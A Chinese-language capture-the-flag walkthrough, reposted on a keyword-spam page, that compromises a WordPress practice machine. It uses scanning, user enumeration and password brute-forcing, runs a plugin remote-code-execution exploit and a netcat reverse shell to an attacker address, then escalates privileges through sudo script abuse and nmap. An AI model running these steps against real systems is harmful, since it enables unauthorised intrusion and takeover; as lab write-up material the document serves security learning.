当前位置: 首页 > wzjs >正文

购物网站设计理念中国市场营销网网站

购物网站设计理念,中国市场营销网网站,网站h1标签的应用,2018年做淘宝客网站需要备案嘛一、主机发现 arp-scan -l靶机ip为192.168.55.159 二、端口扫描、目录枚举、指纹识别、 2.1端口扫描 nmap 192.168.55.159发现没有开放特殊端口 看来信息收集的重点要放在网页中了 2.2目录枚举 dirb http://192.168.55.1592.3指纹识别 nmap 192.168.55.159 -sV -sC -O …

一、主机发现

arp-scan -l

靶机ip为192.168.55.159

二、端口扫描、目录枚举、指纹识别、

2.1端口扫描

nmap 192.168.55.159

发现没有开放特殊端口

看来信息收集的重点要放在网页中了

2.2目录枚举

dirb http://192.168.55.159

2.3指纹识别

nmap 192.168.55.159 -sV -sC -O --version-all

三、进入靶机网页进行信息收集、反弹shell

此靶机需要域名映射,下载靶机时作者给出了方法,不再赘述

发现靶机的网页是wordpress

可以尝试wpscan工具对网站进行扫描

wpscan --url http://wordy/ 

发现wordpress的版本为5.1.1

尝试枚举用户名

wpscan --url http://wordy --enumerate u

枚举出来了5个用户名

接下来尝试使用密码字典进行爆破(下载地址中作者给出了相应的字典)

cp /usr/share/wordlists/rockyou.txt  1.txt (先将该密码复制到桌面上)
cat 1.txt | grep k01 > 2.txt  (根据作者提示筛选密码)

已经爆破出来了一个账号密码

mark
helpdesk01

成功进入靶机后台

发现了wordpress的一个插件

在kali中找此插件的漏洞

searchsploit Activity monitor

发现有远程代码执行漏洞

直接执行该exp即可,拿下低权限shell

python 50110.py

四、nmap提权

发现这个shell不稳定,使用cd命令就自动退出

重新反弹一个shell

nc -lvvp 4444
nc -e /bin/sh 192.168.55.132 4444
python -c "import pty;pty.spawn('/bin/bash')"

4.1靶机信息收集

uname -a
lsb_release -a

筛选一下SUID命令,尝试一下suid提权

find / -perm  -4000 -print 2>/dev/null

发现没有常用的命令,尝试其他思路

4.2登陆graham用户

进入home目录,发现靶机一共有四个用户

其中jens用户目录下有一个备份文件,此备份文件的权限很高,感觉此备份文件可能可以提权,尝试运行,发现无权限

继续查看其它用户的目录下的信息,发现mark用户下有一个员工的文件,看看里面的内容

发现graham用户的账号和密码

su graham
GSo7isUM1D4

4.3登陆jens用户

查看graham用户的sudo命令权限,发现jens用户不需要密码即可登陆

sudo -l

graham用户的权限能够使用backups.sh

将切换jens用户的命令追加到backup.sh中

echo '/bin/bash' >>backups.sh
sudo -u jens ./backups.sh

4.4nmap提权

一样的套路发现nmap这个命令没有密码

去提权网站查找namp提权的方式

尝试使用命令进行提权

提权成功!

http://www.dtcms.com/wzjs/164963.html

相关文章:

  • 门户网站源码网站建设的推广渠道
  • 500网站建设seo快速排名网站优化
  • 网站创建要多少钱线下引流推广方法
  • 域名个人备案查询seo优化技术教程
  • 农机公司网站建设网站流量查询服务平台
  • 帮做试卷的网站抖音关键词推广
  • ftp网站目录上海b2b网络推广外包
  • 自己做qq头像网站app推广策划方案
  • 华为云建设网站定制企业网站建设制作
  • 如何做网站 代码如何网络营销自己的产品
  • 吉林电商网站建设费用长春网站快速排名提升
  • windows7做网站搜索关键词
  • 写手机版网站的静态页面seo网站权重
  • 多用户分布式网站开发服务外包公司
  • 网站用视频做背景音乐百度竞价托管哪家好
  • 南通医院网站建设成免费crm软件有哪些优点
  • 网站的改版怎么做宁波seo排名优化哪家好
  • 做淘宝客网站必须备案吗精准推广
  • 朔州网站设计公司做电商需要学哪些基础
  • 郑州企业网站排名优化青岛做网站推广
  • ovz的vps怎么做网站seo包年优化费用
  • 怎样给WordPress加更新密钥新乡网站优化公司推荐
  • 网站自己做流量自媒体平台app下载
  • jsp电商网站怎么做百度推广一天烧多少钱
  • 做类似美团的网站得多少钱手机系统流畅神器
  • 网站建设需要每年交钱吗百度营销推广靠谱吗
  • 莱芜网站建设优化高级搜索引擎技巧
  • 网站上的用户注册怎么做的优化服务
  • wordpress注册中文版seo一键优化
  • 服装网站建设论文百度账号安全中心